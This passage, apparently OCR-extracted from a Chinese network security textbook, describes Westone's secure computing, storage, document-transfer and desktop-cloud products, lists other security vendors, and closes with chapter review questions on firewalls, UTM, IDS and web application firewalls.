国 国家 密码 管理 局 的 可 信 计 算 规范 ,搭载 我 国 自 主 研发 的 “龙芯 ”处 理 器 ,内 置 国家 密码 
管理 局 认证 的 商 密 模块 ,打造 了 一 个 自主 可 信 的 安全 计算 机 平台 。 龙 芯 计 算 机 系列 继承 
TCG 的 可 信 计 算 思 想 ,利用 高 性 能 PCI 密码 卡 技术 实现 增强 型 可 信 商 密 模块 ,替代 普通 
的 可 信 平 台 模块 ,同时 结合 指纹 生物 识别 技术 、 安 全 BIOS、 多 层次 磁盘 数据 保护 等 技术 ， 
提供 比 普通 可 信 平 台 模块 更 安全 高 效 、 实 用 易 用 的 可 信 计 算 基 础 设施 。 龙 芯 计 算 机 系列 
采用 模块 化 设计 ,可 根据 需要 进行 选择 和 扩展 ,计算 机 还 可 以 采用 特殊 的 加 固 处 理 , 适 用 
于 各 种 恶劣 环境 下 的 使 用 。 

2) SWC-CN5230 网 络 处 理 平台 

SWC5230 系列 网 络 安全 平台 是 面向 信息 安全 市 场 的 通用 网 络 安全 平台 , 它 结合 了 
四 川 卫士 通信 息 安 全 平台 技术 有 限 公 司 在 软件 设计 和 信息 安全 技术 领域 的 长 期 积累 。 
SWC-CN5230 网 络 处 理 平台 采用 CaviumCN5230 四 核 处 理 器 ,可 配置 自主 知识 产权 的 硬 
件 密码 模块 ,实现 国家 主管 部 门 批准 的 密码 算法 ,支持 中 、 低 不 同性 能 的 网 络 安全 应 用 。 
以 OEM 的 方式 降低 信息 安全 厂商 开发 网 络 安全 设备 的 难度 和 风险 ,缩短 最 终 产 品 的 上 
市 时 间 。 

3) 移动 办 公安 全 平台 

成 都 卫士 通信 息 安全 技术 有 限 公司 开发 的 “移动 办 公安 全 平台 ”是 一 套 着 眼 于 在 移 
动 互联 下 解决 用 户 接 人 安全 ,数据 传输 安全 数据 存储 安全 和 机 制 安全 四 位 一 体 的 解决 
方案 。 移 动 办 公安 全 平台 自身 不 提供 办 公 应 用 ,也 不 与 任何 一 种 办 公 应 用 捆绑 ,而 是 一 
套 普遍 适用 于 各 类 移动 办 公 应 用 的 安全 支撑 平台 。 

4) 安全 电子 公文 传输 管理 系统 

安全 电子 公文 传输 管理 系统 是 利用 计算 机 、 打 印 机 、 扫 描 仪 .二 维 条 码 扫描 枪 .计算 
机 软件 、 安 全 密码 模块 .服务 器 密码 机 、 密 钥 制 作 设备 或 电子 政务 基础 设施 等 通用 或 专用 
设备 和 系统 ,借助 计算 机 网 络 构建 的 电子 政务 应 用 系统 。 对 电子 政务 办 公 应 用 中 的 扫描 
文件 .电子 公文 版 式 文件 (Word、PDF 等 ) 或 信息 进行 安全 的 传输 .交换 和 管理 ,并 为 电子 
政务 应 用 提供 业务 支撑 和 安全 保障 。 提 供 的 安全 管理 功能 包括 数据 加 密 、 密 钥 管 理 、 数 
字 签 名 .身份 认证 .电子 签 章 .安全 扫描 等 功能 ,满足 党 政 机 关 、 事 业 单 位 或 大 中 型 企业 对 
办 公文 件 安全 传输 和 管理 的 需求 。 

5) 卫士 通 安全 存储 系统 SecStorage 

卫士 通 安全 存储 系统 SecStorage (简称 安全 存储 系统 ) 是 集 存储 管理 数据 加 密 、 访 
问 权限 控制 和 访问 审计 于 一 体 , 具 有 高 性 能 .高 安全 可 靠 性 等 特点 ,为 信息 系统 的 敏感 数 
据 存储 提供 安全 保障 的 系统 。 安 全 存储 系统 已 取得 国家 保密 局 和 国家 密码 管理 局 资质 。 
系统 组 成 有 : 安全 管理 中 心 ,为 安全 存储 系统 提供 监控 管理 和 对 密 钥 全 生命 周期 的 管理 ; 
安全 存储 阵列 ,存储 管理 及 数据 安全 存储 。 
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6) 卫士 通 安全 桌面 云 

卫士 通 公 司 在 云 操作 系统 、 云 管理 平台 、 云 安全 体系 方面 进行 了 深入 的 技术 研究 和 
产品 开发 ,推出 了 安全 桌面 云 这 一 基于 云 计 算 .虚拟 化 和 密码 技术 的 全 国产 化 IT 解决 方 
案 ,客户 可 以 方便 地 实现 业务 数据 大 集中 数据 的 高 安全 性 .应 用 系统 高 可 靠 性 以 及 IT 
系统 的 管理 等 目标 。 卫 士 通 安全 桌面 云 平台 由 云 终 端 \ 接 入 控制 .桌面 会 话 管理 \ 云 管理 
平台 、 桌 面 资 源 池 、 服 务 器 虚拟 化 资源 池 及 存储 资源 池 组 成 。 


47 其 他 网 络 安全 厂商 


限于 篇 幅 , 还 有 许多 出 色 的 网 络 安全 厂商 未 列 出 ,其 中 包括 H3C、 思 科 、Juniper、 
3Com 浪潮、 网 域 星云 .网 神 、 迪 普 科 技 、 山 石 网 科 、 网 康 科技 、 中 科 网 威 、 东 软 、 亿 阳 通 信 、 
安 氏 领 信 ,瑞星 、 江 民 科技 、360, 等 等 。 国 内 网 络 安全 解决 方案 提供 商 共 有 数 百 家 ,还 没 
包括 国外 提供 商 。 组 织 或 个 人 在 选取 网 络 安全 产品 时 , 需 进行 多 方 比较 ,适合 自己 的 才 
是 最 好 的 。 


48 忆 题 


(1) 请 简 述 市 面 上 常见 的 网 络 安全 设备 有 哪些 ? 

(2) 下 一 代 防 火 墙 具 有 什么 样 的 特点 ? 

(3) 审计 系统 主要 提供 哪些 功能 ? 

(4) 统一 威胁 管理 (UTM) 具 有 什么 样 的 特点 ? 

(5) 网 络 行为 管理 系统 主要 从 哪 几 个 方面 进行 管理 ? 
(6) 入 侵 检 测 系统 (IDS) 起 到 了 什么 作用 ? 

(7) Web 应 用 防火 墙 具 有 哪些 功能 ? 


